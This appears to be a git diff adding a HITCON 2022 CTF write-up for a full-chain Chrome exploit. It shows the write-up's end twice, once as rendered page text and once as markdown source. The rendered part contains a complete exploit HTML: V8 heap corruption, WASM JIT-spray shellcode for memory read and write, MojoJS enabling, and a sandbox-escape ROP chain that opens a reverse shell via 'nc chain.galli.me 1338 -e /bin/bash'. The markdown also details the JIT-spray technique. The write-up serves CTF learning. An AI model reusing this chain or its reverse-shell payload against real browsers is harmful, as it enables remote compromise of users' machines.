Now that we have arbitrary R/W in the renderer process we just need to leak the base of the chrome binary and enable MojoJS. There are probably tons of ways to do this, we used a pointer inside the WASM code page.
+
+
After toggling the MojoJS flag we just have to reload the page and we will have MojoJS, so we can run the Sandbox exploit from before.
+
+
The final exploit html can be found at the end of this page.
+
+
GUI Troubles
+
+
Since we just had too much fun solving these challenges, we decided to go all out for the writeup and make the exploit work while running everything with a GUI (i.e. like a person normally would).
+In theory of course, this should have been a cake walk and it would only require us to install the GUI packages everywhere and set the corresponding settings / flags.
+Unfortunately, it was not that easy.
+
+
Installing the GUI was already quite tricky and I had to setup a completely new VM for it, since installing it on my droplet resulted in all network connections being dropped.
+This proved to be a bit tricky, due to wanting to use a VM in VM setup (so I don’t accidentally mess up my actual system).
+This meant I had to use nested virtualization which should be supported by VirtualBox out of the box.
+My host OS was Windows, since that was the machine I had lying around with nested virtualization supported.
+It took many restarts and convincing Windows that I did not need any kind of safety features to disable Hyper-V and get nested virtualization in VirtualBox working.
+Now I only had to get Chrome working with a GUI, which turned out to be a bit of a pain as well.
+The build provided by the challenge authors unfortunately did not have the necessary resources and e.g. the crash handler.
+Thankfully, Nspace did a local compile of the patched Chrome for local debugging and I was able to get the GUI working by copying over random files from his build.
+
+
Once that was out of the way, I could finally start.
+After some very minor tweaking, the last two steps worked quite well again, even with the GUI.
+However, the first two stages were not working at all.
+The first stage, was failing to leak the code pointer and it turns out that the read outside the V8 sandbox was broken.
+I wasted quite some time here until I finally (grudgingly) installed gdb in the inner VM and attached to chrome.
+It turns out, that my new setup was using different instructions (likely due to being an AMD CPU) for compiling the WASM code and hence the offset used had to change.
+Once that was fixed, the first stage was working again.
+
+
The second stage was still broken though and would always crash at the same place with similar register contents:
Looking at the assembly, the culprit was R15.
+I compared the crashlog to one without GUI and there the exploit would always succeed or R15 was null or 0x20.
+I realized, that when the GUI was enabled, there must be some UAF detection happening, by memsetting free’d chunks to 0xef.
+After scouring the chromium codebase for a few hours (and wasting a lot of time trying to make it work with different timings of the race), I finally figured out that it is their new partition allocator:
+
+
// TODO(keishi): Add PA_LIKELY when brp is fully enabled as |brp_enabled| will
+ // be false only for the aligned partition.
+ if(brp_enabled()){
+ auto*ref_count=internal::PartitionRefCountPointer(slot_start);
+ // If there are no more references to the allocation, it can be freed
+ // immediately. Otherwise, defer the operation and zap the memory to turn
+ // potential use-after-free issues into unexploitable crashes.
+ if(PA_UNLIKELY(!ref_count->IsAliveWithNoKnownRefs()&&
+ brp_zapping_enabled()))
+ internal::SecureMemset(object,internal::kQuarantinedByte,
+ slot_span->GetUsableSize(this));
+
+
+
I did not figure out whether this is just not enabled when running with --headless or the GUI just causes the memset to happen due to other factors.
+In the end, I decided to just disable the new allocator with a command line flag2.
+
+
With all of that fixed, the exploit finally worked when running under a GUI and we were able to capture this glorious video :P (I recommend you turn on sound):
+
+
+
+
Final Exploit HTML
+
+
<html>
+<head>
+
+<script src="http://chain.galli.me:8080/mojo/mojo_bindings.js"></script>
+<script src="http://chain.galli.me:8080/mojo/third_party/blink/public/mojom/sandbox/sandbox.mojom.js"></script>
+
+<script>
+constserver_url='http://chain.galli.me:8080'
+letprintbuf=[];
+functionprint(msg){
+ printbuf.push(msg);
+}
+
+letf64view=newFloat64Array(1);
+letu8view=newUint8Array(f64view.buffer);
+letu64view=newBigUint64Array(f64view.buffer);
+leti32view=newInt32Array(f64view.buffer);
+letu32view=newUint32Array(f64view.buffer);
+
+functiond2i(x){
+ f64view[0]=x;
+ returnu64view[0];
+}
+
+functioni2d(x){
+ u64view[0]=x;
+ returnf64view[0];
+}
+
+functions2u(x){
+ i32view[0]=x;
+ returnu32view[0];
+}
+
+functionhex(x){
+ return`0x${x.toString(16)}`;
+}
+
+functionassert(x,msg){
+ if(!x){
+ throwmsg;
+ }
+}
+
+asyncfunctionrenderer(){
+ lethole=[].hole();
+ letmap=newMap();// len = 0, 2 buckets
+ map.set(1,1);// len = 1, 2 buckets
+ map.set(hole,1);// len = 2, 2 buckets
+ map.delete(hole);// len = 2, 2 buckets
+ map.delete(hole);// len = 0x00048b55, 2 buckets, 2 deleted, pointed to map has len = 0, no deleted, 2 buckets
+ map.delete(1);// len = 0x00048b55, 2 buckets, 2 deleted, points to another map, points to something with len = -1
+ leta=[];
+ map.set(0x10,-1);// set the number of buckets to 0x10
+
+ a.push(1.1);
+
+ letb=[];
+ map.set(b,1337);// overwrite the length of the array
+
+ letc=newUint32Array(16);
+ a[23]=i2d(0x1337133700000000n);
+
+
+ letd=[a];
+ lete=[d];
+
+ letd_addr=c[46]-1;
+
+ a[24]=i2d(0n);
+ a[25]=i2d(0n);
+
+ letd_elements=c[d_addr/4+2]-1;
+
+ functioncageAddressOf(obj){
+ d[0]=obj;
+ returnc[d_elements/4+2]-1;
+ }
+
+ varglobal=newWebAssembly.Global({value:'i64',mutable:true},0n);
+ varwasm_code=newUint8Array([0,97,115,109,1,0,0,0,1,135,128,128,128,0,1,96,2,127,127,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,101,109,101,0,0,10,224,128,128,128,0,1,218,128,128,128,0,0,32,0,184,68,55,19,55,19,55,19,55,19,160,32,1,184,160,68,72,193,226,32,144,144,235,11,160,68,72,9,208,144,144,144,235,11,160,68,139,0,144,144,144,144,235,11,160,68,195,144,144,144,144,144,235,11,160,68,72,193,224,32,144,144,235,11,160,68,72,9,194,144,144,144,235,11,160,68,137,10,195,144,144,144,235,11,160,171,11]);
+ varwasm_mod=newWebAssembly.Module(wasm_code);
+ varwasm_instance=newWebAssembly.Instance(wasm_mod,{js:{global}});
+ letf=wasm_instance.exports.meme;
+
+ f(0x13371337,0x13381338);
+ constcode_addr=BigInt(c[cageAddressOf(wasm_instance)/4+24])|(BigInt(c[cageAddressOf(wasm_instance)/4+25])<<32n);
+
+ leti=0;
+
+ functionmakeInstance(){
+ varglobal2=newWebAssembly.Global({value:'i64',mutable:true},0n);
+ varwasm_code2=newUint8Array([0,97,115,109,1,0,0,0,1,136,128,128,128,0,1,96,3,127,127,127,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,142,128,128,128,0,2,6,109,101,109,111,114,121,2,0,1,97,0,0,10,238,128,128,128,0,1,232,128,128,128,0,0,32,0,184,68,55,19,55,19,55,19,55,19,160,32,1,184,160,32,2,184,160,68,72,139,9,56,192,144,116,6,160,68,104,0,16,0,0,144,116,6,160,68,94,72,49,255,56,192,116,6,160,68,104,255,15,0,0,95,116,6,160,68,72,247,215,144,144,144,116,6,160,68,72,33,207,56,192,144,116,6,160,68,42,240,83,106,10,88,116,6,160,68,81,15,5,195,0,0,0,1,160,171,11]);
+ wasm_code2[wasm_code2.length-4]=i;
+ i++;
+
+ varwasm_mod2=newWebAssembly.Module(wasm_code2);
+ varwasm_instance2=newWebAssembly.Instance(wasm_mod2,{js:{global2}});
+ returnwasm_instance2;
+ }
+
+ functionread32(addr){
+ letwasm_instance2=makeInstance()
+ letf2=wasm_instance2.exports.a;
+
+ constshellcode_addr=code_addr+0x680n+0x25n+0x1fn;
+ c[cageAddressOf(wasm_instance2)/4+24]=Number(shellcode_addr&0xffffffffn);
+ c[cageAddressOf(wasm_instance2)/4+25]=Number((shellcode_addr>>32n)&0xffffffffn);
+ returns2u(f2(Number(addr&0xffffffffn),Number((addr>>32n)&0xffffffffn)));
+ }
+
+ functionwrite32(addr,val){
+ letwasm_instance2=makeInstance()
+ letf2=wasm_instance2.exports.a;
+
+ constshellcode_addr=code_addr+0x680n+0x25n+0x6bn;
+ c[cageAddressOf(wasm_instance2)/4+24]=Number(shellcode_addr&0xffffffffn);
+ c[cageAddressOf(wasm_instance2)/4+25]=Number((shellcode_addr>>32n)&0xffffffffn);
+ f2(Number((addr>>32n)&0xffffffffn),Number(addr&0xffffffffn),val);
+ }
+
+ functionread64(addr){
+ returnBigInt(read32(addr))|(BigInt(read32(addr+4n))<<32n);
+ }
+
+ letleakInstance=makeInstance();
+ letcodePointer=BigInt(c[cageAddressOf(leakInstance)/4+24])|(BigInt(c[cageAddressOf(leakInstance)/4+25])<<32n);
+ lettextPointer=read64(codePointer+0x148n)
+ print(`Code pointer: ${hex(codePointer)}`);
+ print(`Text pointer: ${hex(textPointer)}`);
+
+ letchrome_base=textPointer-0x590ce00n;
+
+ // From https://github.com/google/google-ctf/blob/master/2021/quals/pwn-fullchain/healthcheck/chromium_exploit.html#L122
+ // nm chrome | grep g_frame_map | awk '{print $1}'
+ constg_frame_map_offset=0x000000000e34d168n;
+ // Disassemble content::RenderFrameImpl::EnableMojoJsBindings
+ constenable_mojo_js_bindings_offset=0x448n;
+
+ // g_frame_map is a LazyInstance<FrameMap>,i.e.aFrameMapprecededbya
+ // pointer to the FrameMap.
+ letframe_map_ptr=chrome_base+g_frame_map_offset;
+ letg_frame_map=read64(frame_map_ptr);
+ assert(g_frame_map===frame_map_ptr+8n,'failed to find g_frame_map');
+ print(`g_frame_map: ${hex(g_frame_map)}`);
+
+ // FrameMap is a std::map<blink::WebFrame*,RenderFrameImpl*>,whichis
+ // implemented as a red-black tree in libc++. We'll assume that there is
+ // only one element in the map. The first 8 bytes in the std::map point to
+ // the (only) node.
+ // The layout of a node is as follows:
+ // 0: p64(left)
+ // 8: p64(right)
+ // 16: p64(parent)
+ // 24: p64(is_black) (yes this is a boolean but it takes 64 bits)
+ // 32: key (in our case blink::WebFrame*)
+ // 40: value (in our case RenderFrameImpl*) <--whatwewant
+ letg_frame_map_node=read64(g_frame_map);
+ print(`g_frame_map_node: ${hex(g_frame_map_node)}`);
+ letrender_frame=read64(g_frame_map_node+40n);
+ print(`render_frame: ${hex(render_frame)}`);
+
+ // This is a bool in RenderFrameImpl that controls whether JavaScript has
+ // access to the MojoJS bindings.
+ letenable_mojo_js_bindings_addr=render_frame+enable_mojo_js_bindings_offset;
+ write32(enable_mojo_js_bindings_addr,read32(enable_mojo_js_bindings_addr)|1);
+ // We will have mojo after reloading the page, so do that
+ window.location.reload();
+}
+
+asyncfunctionsbx(){
+ functionnewClient(){
+ letiface=newblink.mojom.SandboxPtr();
+ Mojo.bindInterface(blink.mojom.Sandbox.name,mojo.makeRequest(iface).handle);
+
+ returniface;
+ }
+
+ letfake=newClient();
+ constheap_leak=(awaitfake.getHeapAddress()).addr;
+
+ consttext_leak=(awaitfake.getTextAddress()).addr;
+
+ print(`Text leak: ${hex(text_leak)}`);
+ constchrome_base=BigInt(text_leak)-0x627fc20n;
+ print(`Chrome base: ${hex(chrome_base)}`);
+
+ constsyscall=chrome_base+0x0d8decafn;// syscall;
+ constmove_stack=chrome_base+0x08ff9a59n;// add rsp, 0x28; ret;
+ constpop_rdi=chrome_base+0x0d8e655bn;// pop rdi; ret
+ constpop_rsi=chrome_base+0x0d8cdf7cn;// pop rsi; ret;
+ constpop_rdx=chrome_base+0x0d86e112n;// pop rdx; ret;
+ constpop_rax=chrome_base+0x0d8e64f4n;// pop rax; ret;
+
+ letboxed_mem=BigInt(heap_leak)+0x18n;
+ letfake_object=newBigUint64Array(0x800/8);
+
+ letprog_addr=boxed_mem-7n;
+ letprog_arg=boxed_mem-7n+15n*8n;
+ letprog_arg2=prog_arg+8n;
+
+ fake_object.fill(0x4141414141414141n);
+ fake_object[0]=0x68732f6e69622fn;// /bin/sh
+ fake_object[1]=prog_addr;
+ fake_object[2]=prog_arg;
+ fake_object[3]=prog_arg2;
+ fake_object[4]=0n;
+ fake_object[5]=chrome_base+0x0590cc53n;// mov rsp, [rdi]; mov rbp, [rdi+8]; mov dword ptr [rdi+0x20], 0; jmp qword ptr [rdi+0x10];
+
+ fake_object[6]=pop_rdi;
+ fake_object[7]=prog_addr;
+ fake_object[8]=pop_rsi;
+ fake_object[9]=boxed_mem+8n-7n;
+ fake_object[10]=pop_rdx;
+ fake_object[11]=0n;
+ fake_object[12]=pop_rax;
+ fake_object[13]=59n;
+ fake_object[14]=syscall;
+
+ fake_object[15]=0x632dn;// -c\x00\x00\x00
+
+ // nc chain.galli.me 1338 -e /bin/bash
+ fake_object[16]=0x6e6961686320636en;// nc chain
+ fake_object[17]=0x6d2e696c6c61672en;// .galli.m
+ fake_object[18]=0x2d20383333312065n;// e 1338 -
+ fake_object[19]=0x622f6e69622f2065n;// e /bin/b
+ fake_object[20]=0x687361n;// ash\x00\x00\x00
+
+ fake.pourSand(newUint8Array(fake_object.buffer));
+ print(`Fake object at: ${hex(boxed_mem)}`);
+
+ letclients=[];
+ for(leti=0;i<1000;i++){
+ clients.push(newClient());
+ }
+
+ letspray=[];
+ for(leti=0;i<100;i++){
+ spray.push(newClient());
+ }
+
+ letiface=newClient();
+
+ letarg2=newBigUint64Array(0x1020/8);
+ arg2.fill(BigInt(boxed_mem)+1n);
+ arg2[0x800/8+0x818/8]=0n;
+ arg2[1+0x800/8]=0x12354567n;
+ arg2[2+0x800/8]=move_stack;
+
+ letarg=newUint8Array(arg2.buffer);
+
+ for(leti=0;i<clients.length;i++){
+ clients[i].pourSand(arg);
+ }
+
+ for(leti=0;i<100;i++){
+ iface.pourSand(arg);
+ iface.ptr.reset();
+ iface=newClient();
+ }
+
+ for(leti=0;i<spray.length;i++){
+ spray[i].pourSand(arg);
+ }
+
+ print('done');
+}
+
+asyncfunctionpwn(){
+ print('hello world');
+
+ try{
+ if(typeof(Mojo)==='undefined'){
+ awaitrenderer();
+ }else{
+ print(`Got Mojo!: ${Mojo}`);
+ awaitsbx();
+ }
+ }catch(e){
+ print(`[-] Exception caught: ${e}`);
+ print(e.stack);
+ }
+
+ fetch(`${server_url}/logs`,{
+ method:'POST',
+ body:printbuf.join('\n'),
+ });
+}
+
+pwn();
+
+</script>
+</head>
+</html>
+
The reason why we use rdx, rax to read but rax, rdx to write is that if the same floating-point constant is used twice in the function, the compiler will emit a load from memory instead of an immediate. So we can’t use the same sequence of instructions twice. ↩
+
+
+
Yeah this is kinda cheating, but then again, the challenge was not made with this in mind and I also had to finish this writeup at some point :P. Also I forgot the command line flag, so if you came here looking for that, sorry :/. ↩
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/HITCON-2022/pwn/fourchain-fullchain.md b/HITCON-2022/pwn/fourchain-fullchain.md
new file mode 100755
index 0000000..52e4279
--- /dev/null
+++ b/HITCON-2022/pwn/fourchain-fullchain.md
@@ -0,0 +1,563 @@
+# Fourchain - One For All
+
+**Authors:** [Nspace](https://twitter.com/_MatteoRizzo), [gallileo](https://twitter.com/galli_leo_)
+
+**Tags:** pwn, browser, v8, linux, virtualbox
+
+**Points:** 500
+
+> One challenge for all the vulnerabilities.
+>
+> All these years of training has lead to this moment.
+>
+> Show us who's the best pwner in the world !
+
+The last challenge in the series is about chaining together the four bugs. The challenge runs Linux with the vulnerable module inside the patched Virtualbox, and runs the patched Chromium with both bugs inside this VM. We can provide the URL of our own webpage and the challenge will open it in the patched Chromium. We have to get the flag which is outside the VM.
+
+Escaping the VM once we have a root shell inside is easy, we only need to load the exploit module from the VM escape challenge. Getting a root shell from an unsandboxed unprivileged shell is also easy because we can reuse the kernel exploit from the kernel challenge. The only part that is slightly more problematic is chaining the renderer compromise with the browser sandbox escape.
+
+The sandbox escape needs to send Mojo messages to the browser process to interact with the vulnerable IPC service. The easiest way to do that from a compromised renderer is to enable MojoJS. Using MojoJS also means that we can reuse the exploit from the sandbox escape part unmodified which is nice because it saves us some work. There is a well-documented way to enable Mojo in a compromised renderer with arbitrary R/W, described by Mark Brand in a [Project Zero bug](https://bugs.chromium.org/p/project-zero/issues/detail?id=1755). I reused [the code](https://github.com/google/google-ctf/blob/master/2021/quals/pwn-fullchain/healthcheck/chromium_exploit.html#L122) that I wrote for the Full Chain challenge at Google CTF 2021 for this.
+
+Now the only thing we need is arbitrary read and write in the renderer. Unfortunately we had cheesed the V8 challenge by loading the flag into the sandboxed heap with `Realm.eval` instead of actually bypassing the V8 sandbox. This was good enough for that challenge where we only had to read a file, but it won't work here. We need an actual bypass for the V8 sandbox.
+
+## Uncheesing the V8 Exploit
+
+Earlier this year DiceCTF had [a challenge](https://ctftime.org/task/18826) where players had to find bypasses for the V8 sandbox. The sandbox is now enabled by default in V8 but it's still pretty new and there are many bypasses that haven't been fixed yet. Funnily enough I had discovered the `Realm.eval` cheese when attempting to solve that challenge near the end of the CTF but I couldn't use it because the flag was located at an unguessable path. I remembered that Kylebot from Shellphish had published [a writeup](https://blog.kylebot.net/2022/02/06/DiceCTF-2022-memory-hole/) for that challenge so I started by reading it.
+
+Kylebot's bypass uses WASM and overwrites `imported_mutable_globals` in a `WasmInstance` object to get arbitrary read and write. Unfortunately this bypass [has been patched out](https://source.chromium.org/chromium/_/chromium/v8/v8.git/+/5c152a0f7b53ad24c4e103daad3cbfa94d51c29d) and doesn't work anymore in the version of V8 used in this challenge. Even then I still thought I should take a look at the `WasmInstance` because it had a lot of native pointers in Kylebot's writeup:
+
+```py
+0x12af00197ff5
+pwndbg> tele 0x12af00197ff4
+00:0000│ 0x12af00197ff4 ◂— 0x225900195f89
+01:0008│ 0x12af00197ffc ◂— 0x225900002259 /* 'Y"' */
+02:0010│ 0x12af00198004 ◂— 0x34c900002259 /* 'Y"' */
+03:0018│ 0x12af0019800c ◂— 0x34c9
+04:0020│ 0x12af00198014 ◂— 0x180010000000000
+05:0028│ 0x12af0019801c ◂— 0x10000
+06:0030│ 0x12af00198024 —▸ 0x5555569b5b60 —▸ 0x7ffffff07c60 ◂— 0x7ffffff07c60
+07:0038│ 0x12af0019802c —▸ 0x555556a1ba70 ◂— 0x500000000
+08:0040│ 0x12af00198034 ◂— 0x0
+09:0048│ 0x12af0019803c ◂— 0x0
+0a:0050│ 0x12af00198044 ◂— 0xffffffffff000000
+0b:0058│ 0x12af0019804c —▸ 0x5555569b5b40 —▸ 0x12af00000000 ◂— 0xb000
+0c:0060│ 0x12af00198054 —▸ 0x3a0e9c984000 ◂— jmp 0x3a0e9c984640 /* 0xcccccc0000063be9 */
+0d:0068│ 0x12af0019805c —▸ 0x5555569c2a48 —▸ 0x12af0005213c ◂— 0x5bd88000022c9
+0e:0070│ 0x12af00198064 —▸ 0x5555569c2a40 —▸ 0x12af000497e4 ◂— 0x0
+0f:0078│ 0x12af0019806c —▸ 0x5555569c2a68 —▸ 0x12af001c0000 ◂— 0x0
+10:0080│ 0x12af00198074 —▸ 0x5555569c2a60 —▸ 0x12af00198224 ◂— 0x0
+11:0088│ 0x12af0019807c —▸ 0x5555569b5b50 —▸ 0x7ffffff07c60 ◂— 0x7ffffff07c60
+12:0090│ 0x12af00198084 —▸ 0x5555569d7889 ◂— 0x100000000
+13:0098│ 0x12af0019808c —▸ 0x555556a270c0 ◂— 0x7fff001b7740
+14:00a0│ 0x12af00198094 ◂— 0x34c9000034c9
+15:00a8│ 0x12af0019809c ◂— 0x4958d000034c9
+16:00b0│ 0x12af001980a4 ◂— 0x182dad0004975d
+17:00b8│ 0x12af001980ac ◂— 0x23e100197fb1
+```
+
+Most of the pointers appear to be sandboxed now but there are still a few that are not. I started experimenting by overwriting each of those with 0x41414141 in GDB before calling into the wasm code and got some crashes. The most interesting one was from overwriting the pointer at offset 0x60 because it gave us RIP control:
+
+```py
+Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
+0x0000000041414141 in ?? ()
+LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+──────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────
+*RAX 0x13371337
+*RBX 0x7fffffffd400 —▸ 0x7fffffffd420 ◂— 0xe
+*RCX 0x555555f55631 ◂— mov rax, rbx
+*RDX 0x13381338
+*RDI 0x555556a18620 —▸ 0x555556a0fbe0 ◂— 0x0
+*RSI 0x1ccc00198735 ◂— 0x590000225900195f
+*R8 0x3e359ccb128
+*R9 0x1ccc00198735 ◂— 0x590000225900195f
+*R10 0x7ffff7fbd080
+*R11 0x7ffff7fbd090
+*R12 0x2
+ R13 0x5555569b2420 —▸ 0x1ccc00000000 ◂— 0xb000
+ R14 0x1ccc00000000 ◂— 0xb000
+*R15 0x41414141
+*RBP 0x7fffffffd428 —▸ 0x7fffffffd508 —▸ 0x7fffffffd560 —▸ 0x7fffffffd588 —▸ 0x7fffffffd5f0 ◂— ...
+*RSP 0x7fffffffd3b8 —▸ 0x5554dff10256 ◂— lea rsp, [rbp - 0x48]
+*RIP 0x41414141
+───────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────
+Invalid address 0x41414141
+```
+
+This is very interesting because even though we can't directly overwrite the generated machine code (which is RWX) we can still place some controlled data there by embedding it in immediates and then jumping into the middle of the immediate by overwriting this pointer (JIT spray attack).
+
+Interestingly, Kylebot notes in his writeup that
+
+> After a few trials, I still couldn’t let V8 to dereference this pointer. After following the trace, @adamd and I found out that the real pointer used for invoking the shellcode resides on ptmalloc heap, which is outside of the cage.
+
+It seems that this might have changed in newer versions of V8 and that this attack is now possible.
+
+The gist of the attack is that we will compile a WASM function similar to this
+
+```c
+int a(unsigned long x, unsigned long y) {
+ double g1 = 1.4501798452584495e-277;
+ double g2 = 1.4499730218924257e-277;
+ double g3 = 1.4632559875735264e-277;
+ double g4 = 1.4364759325952765e-277;
+ double g5 = 1.450128571490163e-277;
+ double g6 = 1.4501798485024445e-277;
+ double g7 = 1.4345589834166586e-277;
+ double g8 = 1.616527814e-314;
+
+ return g1 + g2 + g3 + g4 + g5 + g6 + g7 + g8;
+}
+```
+
+and choose the floating-point values so that their binary encoding is also valid machine code. By jumping into the next imediate when we run out of space we can construct an arbitrarily-long instruction sequence. And since V8's WASM compiler is deterministic we just have to add an offset to the pointer we were just overwriting to execute our sprayed shellcode.
+
+By inspection in GDB we can see that the calling convention that V8 uses for WASM is register-based with 32-bit integer arguments passed in `eax`, `edx`, `ecx` and integer values are returned in `eax`. The following shellcode gives us arbitrary read and write outside of the sandbox [^1]:
+
+```nasm
+sal rdx, 32
+or rax, rdx
+mov eax, dword ptr [rax]
+ret
+
+sal rax, 32
+or rdx, rax
+mov dword ptr [rdx], ecx
+ret
+```
+
+[^1]: The reason why we use rdx, rax to read but rax, rdx to write is that if the same floating-point constant is used twice in the function, the compiler will emit a load from memory instead of an immediate. So we can't use the same sequence of instructions twice.
+
+All seems good now and after figuring out the offsets we can get our arbitrary read and write:
+
+```py
+Thread 1 "d8" received signal SIGSEGV, Segmentation fault.
+0x0000303536423736 in ?? ()
+LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
+──────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────────────────────────────────────────────
+ RAX 0x0
+*RBX 0x5554dff173b8 ◂— cmp eax, dword ptr [r13 + 0x220]
+*RCX 0x42424242
+*RDX 0x41414141
+*RDI 0x555556a1f080 —▸ 0x555556a1f030 ◂— 0x0
+*RSI 0x3ae300199219 ◂— 0x590000225900195f
+*R8 0x4011f608d37
+*R9 0x7fffffffd348 —▸ 0x3ae300199315 ◂— 0xc90019930100002f /* '/' */
+*R10 0x7ffff7fbd080
+*R11 0x7ffff7fbd090
+*R12 0x2
+*R13 0x5555569b2420 —▸ 0x3ae300000000 ◂— 0xb000
+*R14 0x3ae300000000 ◂— 0xb000
+*R15 0x303536423710 ◂— shl rax, 0x20 /* 0xbeb909020e0c148 */
+*RBP 0x7fffffffd390 —▸ 0x7fffffffd420 —▸ 0x7fffffffd508 —▸ 0x7fffffffd560 —▸ 0x7fffffffd588 ◂— ...
+*RSP 0x7fffffffd310 —▸ 0x5554dff10256 ◂— lea rsp, [rbp - 0x48]
+*RIP 0x303536423736 ◂— mov dword ptr [rdx], ecx /* 0xbeb909090c30a89 */
+───────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────
+ ► 0x303536423736 mov dword ptr [rdx], ecx
+ 0x303536423738 ret
+```
+
+Except, there is a slight problem. The code pointer that we are overwriting only seems to be used once, the first time a function in that WASM instance is called. After that it's not used anymore and the JIT spray doesn't work. This probably has to do with lazy compilation. Creating a new WASM instance every time we want to read or write *almost* works, but not quite. It seems that V8 *also* has a cache of compiled WASM bytecode, so if we attempt to create two completely different WASM modules that use the same bytecode it will only compile the code once, so the JIT spray attack only works on the first.
+
+Our solution was simply to change the WASM bytecode every time we create a new instance. We just selected some byte that didn't appear to have an effect on the shellcode when changed and wrote some JavaScript that increments that byte every time we create a new WASM instance. Very hacky but it works.
+
+Now that we have arbitrary R/W in the renderer process we just need to leak the base of the `chrome` binary and enable MojoJS. There are probably tons of ways to do this, we used a pointer inside the WASM code page.
+
+After toggling the MojoJS flag we just have to reload the page and we will have MojoJS, so we can run the Sandbox exploit from before.
+
+The final exploit html can be found at the end of this page.
+
+## GUI Troubles
+
+Since we just had too much fun solving these challenges, we decided to go all out for the writeup and make the exploit work while running everything with a GUI (i.e. like a person normally would).
+In theory of course, this should have been a cake walk and it would only require us to install the GUI packages everywhere and set the corresponding settings / flags.
+Unfortunately, it was not that easy.
+
+Installing the GUI was already quite tricky and I had to setup a completely new VM for it, since installing it on my droplet resulted in all network connections being dropped.
+This proved to be a bit tricky, due to wanting to use a VM in VM setup (so I don't accidentally mess up my actual system).
+This meant I had to use nested virtualization which should be supported by VirtualBox out of the box.
+My host OS was Windows, since that was the machine I had lying around with nested virtualization supported.
+It took many restarts and convincing Windows that I did not need any kind of safety features to disable Hyper-V and get nested virtualization in VirtualBox working.
+Now I only had to get Chrome working with a GUI, which turned out to be a bit of a pain as well.
+The build provided by the challenge authors unfortunately did not have the necessary resources and e.g. the crash handler.
+Thankfully, Nspace did a local compile of the patched Chrome for local debugging and I was able to get the GUI working by copying over random files from his build.
+
+Once that was out of the way, I could finally start.
+After some very minor tweaking, the last two steps worked quite well again, even with the GUI.
+However, the first two stages were not working at all.
+The first stage, was failing to leak the code pointer and it turns out that the read outside the V8 sandbox was broken.
+I wasted quite some time here until I finally (grudgingly) installed gdb in the inner VM and attached to chrome.
+It turns out, that my new setup was using different instructions (likely due to being an AMD CPU) for compiling the WASM code and hence the offset used had to change.
+Once that was fixed, the first stage was working again.
+
+The second stage was still broken though and would always crash at the same place with similar register contents:
+
+```cpp
+Received signal 11 000000000000
+#0 0x55fa415d15b2 base::debug::CollectStackTrace()
+#1 0x55fa41537783 base::debug::StackTrace::StackTrace()
+#2 0x55fa415d10d1 base::debug::(anonymous namespace)::StackDumpSignalHandler()
+#3 0x7f2179098140 (/usr/lib/x86_64-linux-gnu/libpthread-2.31.so+0x1313f)
+#4 0x55fa3fd520e4 content::SandboxImpl::Pour()
+#5 0x55fa41584f81 base::TaskAnnotator::RunTaskImpl()
+#6 0x55fa4159d2cd base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWorkImpl()
+#7 0x55fa4159cbbf base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWork()
+#8 0x55fa4159da55 base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::DoWork()
+#9 0x55fa415f8193 base::MessagePumpEpoll::Run()
+#10 0x55fa4159ddab base::sequence_manager::internal::ThreadControllerWithMessagePumpImpl::Run()
+#11 0x55fa41563db9 base::RunLoop::Run()
+#12 0x55fa415bd098 base::Thread::Run()
+#13 0x55fa3f6d8a60 content::BrowserProcessIOThread::IOThreadRun()
+#14 0x55fa415bd1b7 base::Thread::ThreadMain()
+#15 0x55fa415e494f base::(anonymous namespace)::ThreadFunc()
+#16 0x7f217908cea7 start_thread
+#17 0x7f21780afa2f clone
+ r8: 00001b6802012300 r9: 00007f217080e06f r10: 0000000000010001 r11: 0000000000000001
+ r12: 00001b68010c7c20 r13: 0000000000000800 r14: 00001b68010c6c00 r15: efefefefefefefef
+ di: 000055fa47c6ccc8 si: 00001b6801f32300 bp: 00007f217080e140 bx: 00001b6801cc8000
+ dx: 0000000000000800 ax: 00001b6802012b20 cx: 0000000000000000 sp: 00007f217080e0f0
+ ip: 000055fa3fd520e4 efl: 0000000000010282 cgf: 002b000000000033 erf: 0000000000000000
+ trp: 000000000000000d msk: 0000000000000000 cr2: 0000000000000000
+[end of stack trace]
+Segmentation fault
+```
+
+Looking at the assembly, the culprit was R15.
+I compared the crashlog to one without GUI and there the exploit would always succeed or R15 was null or `0x20`.
+I realized, that when the GUI was enabled, there must be some UAF detection happening, by memsetting free'd chunks to `0xef`.
+After scouring the chromium codebase for a few hours (and wasting a lot of time trying to make it work with different timings of the race), I finally figured out that it is their new partition allocator:
+
+```cpp
+ // TODO(keishi): Add PA_LIKELY when brp is fully enabled as |brp_enabled| will
+ // be false only for the aligned partition.
+ if (brp_enabled()) {
+ auto* ref_count = internal::PartitionRefCountPointer(slot_start);
+ // If there are no more references to the allocation, it can be freed
+ // immediately. Otherwise, defer the operation and zap the memory to turn
+ // potential use-after-free issues into unexploitable crashes.
+ if (PA_UNLIKELY(!ref_count->IsAliveWithNoKnownRefs() &&
+ brp_zapping_enabled()))
+ internal::SecureMemset(object, internal::kQuarantinedByte,
+ slot_span->GetUsableSize(this));
+```
+
+I did not figure out whether this is just not enabled when running with `--headless` or the GUI just causes the memset to happen due to other factors.
+In the end, I decided to just disable the new allocator with a command line flag[^4].
+
+With all of that fixed, the exploit finally worked when running under a GUI and we were able to capture this glorious video :P (I recommend you turn on sound):
+
+
+
+[^4]: Yeah this is kinda cheating, but then again, the challenge was not made with this in mind and I also had to finish this writeup at some point :P. Also I forgot the command line flag, so if you came here looking for that, sorry :/.
+
+
+## Final Exploit HTML
+
+```html
+
+
